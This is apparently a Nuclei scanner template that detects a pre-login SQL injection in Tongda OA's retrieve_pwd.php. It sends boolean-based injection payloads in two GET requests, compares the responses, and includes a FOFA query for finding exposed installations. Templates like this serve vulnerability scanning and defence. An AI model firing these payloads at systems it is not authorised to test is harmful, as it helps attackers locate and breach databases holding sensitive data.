id: TongDa-26

info:
  name: 通达OA retrieve_pwd存在前台SQL注入漏洞
  author: pussycat0x
  severity: high
  description: |
    通达OA /ispirit/retrieve_pwd.php 存在前台SQL注入漏洞，攻击者无需登录可以利用漏洞获取数据库内敏感信息。
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="通达OA网络智能办公系统"
  tags: TongDa,OA,SQL注入漏洞
request:
  - raw:
      - |
        GET /ispirit/retrieve_pwd.php?_GET[username]=admin%27+and+%271%27%3D%271+ HTTP/1.1
        Host: {{RootURL}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
      - |
        GET /ispirit/retrieve_pwd.php?_GET[username]=admin%27+and+%271%27%3D%272+ HTTP/1.1
        Host: {{RootURL}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
    matchers-condition: and
    matchers:
      - type: word
        part: body_0
        words: 
          - "您没有设置"
      - type: word
        part: body_1
        words: 
          - "用户不存在"